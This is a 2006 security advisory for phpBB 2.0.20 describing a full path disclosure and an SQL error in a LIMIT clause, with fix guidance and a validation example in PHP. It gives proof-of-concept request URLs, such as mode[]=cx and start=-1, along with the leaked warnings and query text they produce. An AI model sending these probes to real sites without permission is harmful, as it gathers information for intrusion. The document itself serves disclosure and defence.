[Full-disclosure] phpBB 2.0.20 Full Path Disclosure and SQL Errors

Published: May 06, 2006 (SECURITYVULNS:DOC:12557, via vulners.com)

Source: http://securityreason.com/achievement_securityalert/38


[phpBB 2.0.20 Full Path Disclosure and SQL Errors]

Author: Maksymilian Arciemowicz (cXIb8O3)
Date:
  • Written: 1.5.2006
  • Public: 5.5.2006

from SecurityReason.Com

CVE:
  • CVE-2006-2219 Full Path Disclosure
  • CVE-2006-2220 SQL Errors
— 0. Description —

phpBB is a high powered, fully scalable, and highly customizable Open Source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP server language and your choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers, phpBB is the ideal free community solution for all web sites.

Contact the authors at http://www.phpbb.com/about.php.

— 1. Full Path Disclosure —

Many scripts, phpBB among them, share a basic bug: request variables are passed straight into specific PHP functions that expect a string. For example, the argument parsing inside the function htmlspecialchars():

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|ls", &str, &str_len, &quote_style,
                              &hint_charset, &hint_charset_len) == FAILURE) {
        return;
    }

As you can see, the function checks the type of its input (the "s" specifier requires a string). If the variable is anything other than a string (for example an array), PHP emits a warning, and that warning contains the script's full path.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?mode[]=cx

— Code —

    if ( isset($HTTP_GET_VARS['mode']) || isset($HTTP_POST_VARS['mode']) )
    {
        $mode = ( isset($HTTP_POST_VARS['mode']) ) ? htmlspecialchars($HTTP_POST_VARS['mode']) : htmlspecialchars($HTTP_GET_VARS['mode']);
    }
    else
    {
        $mode = 'joined';
    }

— Code —

— Result —

    Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/memberlist.php on line 40

    Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 483

    Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 485

    Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/memberlist.php:40) in /www/2020/phpBB2/includes/page_header.php on line 486

— Result —

http://[HOST]/2020/phpBB2/viewtopic.php?t=2&highlight[]=cx

— Result —

    Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 487

    Warning: urlencode() expects parameter 1 to be string, array given in /www/2020/phpBB2/viewtopic.php on line 498

    Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 483

    Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 485

    Warning: Cannot modify header information - headers already sent by (output started at /www/2020/phpBB2/viewtopic.php:487) in /www/2020/phpBB2/includes/page_header.php on line 486

— Result —

The problem only appears when display_errors is enabled (display_errors==1), but that is the case on many websites (even at php.net).

— 2. SQL Errors —

The problem arises because any integer we supply is appended unchecked to the end of the SQL query, in the LIMIT clause. The query will fail if the value is below 0 or above -2^32.

Example:

http://[HOST]/2020/phpBB2/memberlist.php?start=-1

— Code —

    $start = ( isset($HTTP_GET_VARS['start']) ) ? intval($HTTP_GET_VARS['start']) : 0;

— Code —

— Result —

    Could not query users

    DEBUG MODE

    SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 50' at line 4

    SELECT username, user_id, user_viewemail, user_posts, user_regdate, user_from, user_website, user_email, user_icq, user_aim, user_yim, user_msnm, user_avatar, user_avatar_type, user_allowavatar FROM phpbb_users WHERE user_id <> -1 ORDER BY user_regdate ASC LIMIT -1, 50

    Line : 151
    File : memberlist.php

— Result —

— 3. How to fix —

Turn off display_errors, or check the type of the variable with a function like is_string() before passing it on.
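As an added example (not phpBB's own code), the following PHP applies both fixes above to the two parameters discussed in sections 1 and 2, mode and start. The request arrays at the bottom are constructed to mirror the advisory's URLs; the helper names are hypothetical.

```php
<?php
// Added example, not phpBB's own code: the two inputs from this advisory handled
// safely. phpBB 2.0.20 fed $HTTP_GET_VARS['mode'] straight to htmlspecialchars(),
// which warns (printing the script path when display_errors is on) if it gets an
// array, and fed intval($start) unchecked into LIMIT, so start=-1 broke the query.

// Fix from section 3: never show PHP warnings to the client, log them instead.
ini_set('display_errors', '0');
ini_set('log_errors', '1');

// Accept the parameter only if it is a plain string; an array such as mode[]=cx
// falls back to the default and never reaches htmlspecialchars().
function read_string_param(array $request, string $name, string $default): string
{
    if (!isset($request[$name]) || !is_string($request[$name])) {
        return $default;
    }
    return htmlspecialchars($request[$name], ENT_QUOTES, 'UTF-8');
}

// Return a non-negative integer offset that is safe to place in LIMIT; anything
// else (array, negative number, non-numeric text) becomes 0.
function read_offset_param(array $request, string $name): int
{
    if (!isset($request[$name]) || !is_string($request[$name])) {
        return 0;
    }
    $value = filter_var($request[$name], FILTER_VALIDATE_INT,
                        ['options' => ['min_range' => 0]]);
    return ($value === false) ? 0 : $value;
}

// Constructed request arrays mirroring the advisory's two URLs (not a real $_GET).
$cases = [
    ['mode' => 'joined', 'start' => '0'],   // ordinary request
    ['mode' => ['cx'],   'start' => '-1'],  // memberlist.php?mode[]=cx&start=-1
];
foreach ($cases as $get) {
    $mode  = read_string_param($get, 'mode', 'joined');
    $start = read_offset_param($get, 'start');
    // Only the validated integer is interpolated, so '-1, 50' can never appear here.
    $sql = sprintf('SELECT username FROM phpbb_users WHERE user_id <> -1 '
                 . 'ORDER BY user_regdate ASC LIMIT %d, 50', $start);
    echo "mode={$mode} start={$start}\n{$sql}\n";
}
```

The second case yields mode=joined and start=0, so neither the htmlspecialchars() warning nor the LIMIT -1 syntax error can occur.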

— 4. Greets —

sp3x

Infospec, p_e_a, krasza, revival, l5x


